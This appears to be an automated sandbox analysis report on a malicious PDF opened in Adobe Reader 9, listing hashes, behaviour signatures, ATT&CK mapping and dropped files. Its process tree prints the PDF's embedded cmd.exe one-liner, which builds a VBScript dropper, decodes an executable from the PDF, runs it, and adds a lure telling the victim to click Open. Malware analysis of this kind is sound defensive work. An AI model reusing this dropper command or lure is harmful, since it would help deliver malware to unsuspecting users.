8ad7d552a59bad165802cb699d6d94596fdd73ae0fd09f667470aaea96d2bb15

Resubmissions

06/11/2023, 13:49

231106-q47qmsbe4v 5

06/11/2023, 13:16

231106-qhtlwsch86 5

06/11/2023, 13:13

231106-qf2vgsbc61 5

Analysis

max time kernel
129s
max time network
120s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
06/11/2023, 13:16

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

mal.pdf
Size

289KB
MD5

59dc0e028d1b9e03e850bc92ea5fcfdb
SHA1

4b876f86ef7b35e4d3aefa8bfd1f36a7bca018e5
SHA256

e9b4759aabe88ebffacaa872eb865d80f8c6e0e10429add924a4ad39490e485e
SHA512

0d299b03d8bb3c5916f25247410dc7c558f3ed9edcbf4b00b146fd1d40db5b001ec4438976905497ad2ba6032bb22b4239a2616705a4117c4b70823da9ae362c
SSDEEP

3072:1afbdjcUJ9icpieOm/1QPqYoUCfNI81xCZZW2n3ERVyarpK0pXgkEzJd5xid1Hz:YDwXoRdpBEzA

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
764	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: 33	1896	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1896	AUDIODG.EXE
Token: 33	1896	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1896	AUDIODG.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
764	AcroRd32.exe
764	AcroRd32.exe
764	AcroRd32.exe
764	AcroRd32.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 764 wrote to memory of 2104	764	AcroRd32.exe	28
PID 764 wrote to memory of 2104	764	AcroRd32.exe	28
PID 764 wrote to memory of 2104	764	AcroRd32.exe	28
PID 764 wrote to memory of 2104	764	AcroRd32.exe	28
PID 2104 wrote to memory of 2704	2104	cmd.exe	30
PID 2104 wrote to memory of 2704	2104	cmd.exe	30
PID 2104 wrote to memory of 2704	2104	cmd.exe	30
PID 2104 wrote to memory of 2704	2104	cmd.exe	30

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\mal.pdf"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:764
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C echo Set o=CreateObject^("Scripting.FileSystemObject"^):Set f=o.OpenTextFile^("evil.pdf",1,True^):f.SkipLine:Set w=CreateObject^("WScript.Shell"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^("%TEMP%"^)+"\msf.exe",2,True^):a=Split^(Trim^(Replace^(f.ReadLine,"\x"," "^)^)^):for each x in a:g.Write^(Chr^("&h" ^& x^)^):next:g.Close:f.Close > 1.vbs && cscript //B 1.vbs && start %TEMP%\msf.exe && del /F 1.vbs To view the encrypted content please tick the "Do not show this message again" box and press Open.
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2104
- - C:\Windows\SysWOW64\cscript.exe
    cscript //B 1.vbs
    3⤵
    PID:2704

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1.vbs

Filesize
347B

MD5
e8a124a023964d03d3f3188d4166f0f1

SHA1
f64b174607b8aa17ca0daa726062d5b3a90ed2b0

SHA256
00cd2a574b0ca77e5d39dd40b4668a5e77e1937b6472e0aaab4eea4aff50d7cb

SHA512
f97d8d7d57b2ae042d38a88d21e01b1043b98746becab4e067503fd1a0905ce0d695f03e210c9ba84cbf1366e79460998e2bce8191404442e8c15621bf4d8b42

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
f51f36759b4c1970e852d61624d682f1

SHA1
f9534ef55691ef663598b892f25b6cf0c9fdb846

SHA256
c4b68ff80e49403f261c713e7d34c5346d5c5cc4ac99cdffc0f37c459f7647f5

SHA512
2315805b9442a59ef11efcfe432bc90b529ab39281a8366d9601f430c1109316fb74cb6f843bf45ec2b7bd99ab40b65fc555c22e23ee80b4e5885fe43cb3ba95

Download Submit
memory/2104-12-0x00000000004F0000-0x00000000004F1000-memory.dmp

Filesize
4KB

Download
memory/2104-34-0x00000000004F0000-0x00000000004F1000-memory.dmp

Filesize
4KB

Download